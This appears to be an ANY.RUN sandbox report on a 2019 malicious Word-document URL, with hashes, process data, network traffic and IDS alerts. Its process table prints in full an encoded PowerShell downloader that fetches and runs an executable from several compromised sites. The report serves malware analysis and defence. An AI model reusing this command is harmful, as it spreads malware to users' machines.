analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://www.sallywensleypainting.com.au/wp-admin/b54pq-bqcbd-peus.view/

Full analysis: https://app.any.run/tasks/e05cade1-2e7c-479d-a5c2-9a017ddca7f3
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: April 24, 2019, 21:17:57
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
Indicators:
MD5:

BE41CFD0709D0FDEC69C62310323BA8B

SHA1:

51B84742E217155EA50F0D6B8E319C83251E5B76

SHA256:

00F7D2CA52E4635094604B0C436CAABF3E8269091A20B3F31D874CC45EA19063

SSDEEP:

3:N1KJS4j8LvURKlbfIGFHfKADnDn:Cc4QIefDn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • iexplore.exe (PID: 3064)
      • WINWORD.EXE (PID: 2808)
    • Application launched itself

      • WINWORD.EXE (PID: 2808)
    • Creates files in the user directory

      • powershell.exe (PID: 1472)
  • INFO

    • Application launched itself

      • iexplore.exe (PID: 3064)
    • Changes internet zones settings

      • iexplore.exe (PID: 3064)
    • Reads internet explorer settings

      • iexplore.exe (PID: 1532)
    • Dropped object may contain Bitcoin addresses

      • iexplore.exe (PID: 1532)
      • WINWORD.EXE (PID: 2808)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 1532)
    • Creates files in the user directory

      • iexplore.exe (PID: 3064)
      • iexplore.exe (PID: 1532)
      • WINWORD.EXE (PID: 2808)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2808)
      • WINWORD.EXE (PID: 3860)
    • Reads settings of System Certificates

      • powershell.exe (PID: 1472)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
5
Malicious processes
0
Suspicious processes
0

Behavior graph

Click at the process to see the details
start iexplore.exe iexplore.exe winword.exe no specs winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3064"C:\Program Files\Internet Explorer\iexplore.exe" -nohomeC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
1532"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3064 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2808"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\QM8GCAH8\INSTR085923718879[1].doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3860"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
1472powershell -e JABrADAAOQBfADMAXwA9ACgAJwBMAF8AXwA5ACcAKwAnADUAMwA5ACcAKwAnADAAJwApADsAJAB0ADYANABfADIANAAwAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFYANgA2ADYAOQBfAF8AMwA9ACgAJwBoAHQAJwArACcAdABwADoALwAnACsAJwAvACcAKwAnAGEAJwArACcAbgBvAHIAJwArACcAaQAnACsAJwBtAG8AaQAuAGMAbwBtAC8AJwArACcAdwBwACcAKwAnAC0AaQBuAGMAbAAnACsAJwB1AGQAZQBzAC8AcgBBAGEAcwAnACsAJwAvAEAAJwArACcAaAB0AHQAJwArACcAcAAnACsAJwA6AC8ALwAnACsAJwBhAG4AdABvAHIAcgBlAHMALgBjAG8AJwArACcAbQAvAHcAJwArACcAcAAtAGEAZABtAGkAbgAvAG8AJwArACcAeQBaAC8AQABoAHQAJwArACcAdAAnACsAJwBwADoALwAvAGIAJwArACcAbwBuAGQAaQBiACcAKwAnAGEAYwBrAHAAJwArACcAYQBjAGsAZQAnACsAJwByAHMAJwArACcAbgAnACsAJwBoACcAKwAnAGEAdAByAGEAbgBnACcAKwAnAC4AYwAnACsAJwBvAG0AJwArACcALwB3AHAALQBhACcAKwAnAGQAbQBpAG4ALwBjACcAKwAnADEAZQAnACsAJwBzAHoALQAnACsAJwB3ACcAKwAnAHcAegAzADQALQB3ACcAKwAnAGEAawBrACcAKwAnAC4AdgBpAGUAJwArACcAdwAvAEUAbABFACcAKwAnAHgAYgAvAEAAaAB0AHQAcAA6AC8AJwArACcALwBzAHAAJwArACcAaQByAGkAdAAnACsAJwB2ACcAKwAnADIAJwArACcALgBjAG8AbQAvAHMAMAAxACcAKwAnAC8AbQBTAGcANAByAGQALwBAACcAKwAnAGgAdAB0AHAAOgAnACsAJwAvAC8AJwArACcAcwAnACsAJwBtACcAKwAnAHMAYQBmAGkAbABpAGEAZABvAHMAJwArACcALgBjAG8AbQAvAHcAdwA0AHcAJwArACcALwBpAFUAJwArACcAdwAnACsAJwBmAC8AJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQASABfADEAOQA0AF8APQAoACcATwA4ADMAXwAzACcAKwAnADkANgAnACsAJwA1ACcAKQA7ACQARAAxADcANwBfAF8AIAA9ACAAKAAnADIAJwArACcAMwA1ACcAKQA7ACQAbAAwADcAMwBfADkANgA9ACgAJwB6AF8ANwBfACcAKwAnADEAJwArACcAXwAnACkAOwAkAGoAXwA1ADcANgBfADYAXwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARAAxADcANwBfAF8AKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABqADMAXwA3ADAAOABfACAAaQBuACAAJABWADYANgA2ADkAXwBfADMAKQB7AHQAcgB5AHsAJAB0ADYANABfADIANAAwAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGoAMwBfADcAMAA4AF8ALAAgACQAagBfADUANwA2AF8ANgBfACkAOwAkAEoAMgA3ADAAXwA0AD0AKAAnAGIANwBfADYANAAnACsAJwAxAF8AJwArACcAOQAnACkAOwBJAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABqAF8ANQA3ADYAXwA2AF8AKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABqAF8ANQA3ADYAXwA2AF8AOwAkAFMAXwBfADYAMQBfAF8AMQA9ACgAJwBDACcAKwAnADYAXwA2AF8AJwArACcAMgAyACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABwAF8ANgBfADcAMwAyAD0AKAAnAHcAJwArACcAXwBfACcAKwAnAF8AOQA1ADcAXwAnACkAOwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 582
Read events
2 111
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
14
Unknown types
7

Dropped files

PID
Process
Filename
Type
3064iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].ico
MD5:
SHA256:
3064iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
2808WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRB632.tmp.cvr
MD5:
SHA256:
2808WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_5B9C833E-A804-460C-90A0-EF39B9AAD51D.0\C02D7AB4.doc\:Zone.Identifier:$DATA
MD5:
SHA256:
1532iexplore.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\[email protected][1].txttext
MD5:9171C364A2AA7C6A85AC80B0305DE134
SHA256:D54F7D25C00E5882726CC71C31106043E69589EA9F4CD3600604264540D9C701
1532iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\QM8GCAH8\INSTR085923718879[1].docxml
MD5:8363A0E158CC63E7F14920A27F8A01A5
SHA256:CF0580D255063E46AAC35D24F7222B9789DE3E2E62C971E050551A1C7E98A5C0
1532iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012019042420190425\index.datdat
MD5:DC9DBAE9D9524BA896E97ED0E5872D10
SHA256:9FAD54A4D9CE661D0BB0149A0CD4A5B05D3887990531A5F825827C1C7A6CBCA7
1532iexplore.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\index.datdat
MD5:E990B40F0D55976DD2CBD6CAD85172A1
SHA256:6615A5717B29CAA2DC992E63FED0D2DAF5E2C1456F0E74A08B6736074202452C
1532iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.datdat
MD5:7C2562AAF22AAC280804FDB2E55D8655
SHA256:B6A2C32C5B2D0F49AA4045598708A407808C40D376DE1E715547A0805C7C6BE6
2808WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:8901A4B7FA40B79BBCA54AF38154E08C
SHA256:2670455314A2F34BCE7DD5B6E0D78A086AB235CC08370F16A3A0AEAF013D2C8E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
11
DNS requests
8
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3064
iexplore.exe
GET
200
118.127.28.57:80
http://www.sallywensleypainting.com.au/favicon.ico
AU
malicious
1532
iexplore.exe
GET
200
118.127.28.57:80
http://www.sallywensleypainting.com.au/wp-admin/b54pq-bqcbd-peus.view/
AU
xml
195 Kb
malicious
1472
powershell.exe
GET
302
192.185.160.67:80
http://antorres.com/wp-admin/oyZ/
US
html
291 b
suspicious
1532
iexplore.exe
GET
200
118.127.28.57:80
http://www.sallywensleypainting.com.au/wp-admin/b54pq-bqcbd-peus.view/
AU
xml
195 Kb
malicious
1472
powershell.exe
GET
503
87.239.16.155:80
http://anorimoi.com/wp-includes/rAas/
GB
html
504 b
suspicious
1472
powershell.exe
GET
163.44.194.47:80
http://bondibackpackersnhatrang.com/wp-admin/c1esz-wwz34-wakk.view/ElExb/
VN
suspicious
1472
powershell.exe
GET
200
192.185.160.67:80
http://antorres.com/cgi-sys/suspendedpage.cgi
US
html
850 b
suspicious
3064
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
1472
powershell.exe
GET
404
163.44.194.47:80
http://bondibackpackersnhatrang.com/wp-admin/c1esz-wwz34-wakk.view/ElExb/
VN
html
37.4 Kb
suspicious
1472
powershell.exe
GET
200
51.83.23.202:80
http://spiritv2.com/s01/mSg4rd/
GB
html
1.44 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3064
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3064
iexplore.exe
118.127.28.57:80
www.sallywensleypainting.com.au
Wholesale Services Provider
AU
malicious
1472
powershell.exe
192.185.160.67:80
antorres.com
CyrusOne LLC
US
suspicious
1472
powershell.exe
51.83.23.202:80
spiritv2.com
GB
unknown
1472
powershell.exe
185.57.173.112:443
smsafiliados.com
ServiHosting Networks S.L.
NL
unknown
1472
powershell.exe
87.239.16.155:80
anorimoi.com
Avensys Networks Ltd
GB
suspicious
1532
iexplore.exe
118.127.28.57:80
www.sallywensleypainting.com.au
Wholesale Services Provider
AU
malicious
1472
powershell.exe
163.44.194.47:80
bondibackpackersnhatrang.com
GMO RUNSYSTEM JSC
VN
suspicious
1472
powershell.exe
185.57.173.112:80
smsafiliados.com
ServiHosting Networks S.L.
NL
unknown

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
www.sallywensleypainting.com.au
  • 118.127.28.57
malicious
anorimoi.com
  • 87.239.16.155
suspicious
antorres.com
  • 192.185.160.67
suspicious
bondibackpackersnhatrang.com
  • 163.44.194.47
suspicious
spiritv2.com
  • 51.83.23.202
malicious
smsafiliados.com
  • 185.57.173.112
unknown
www.hdbits.es
  • 185.57.173.112
unknown

Threats

PID
Process
Class
Message
1532
iexplore.exe
A Network Trojan was detected
ET TROJAN Possible malicious Office doc hidden in XML file
1532
iexplore.exe
A Network Trojan was detected
ET TROJAN Possible malicious Office doc hidden in XML file
No debug info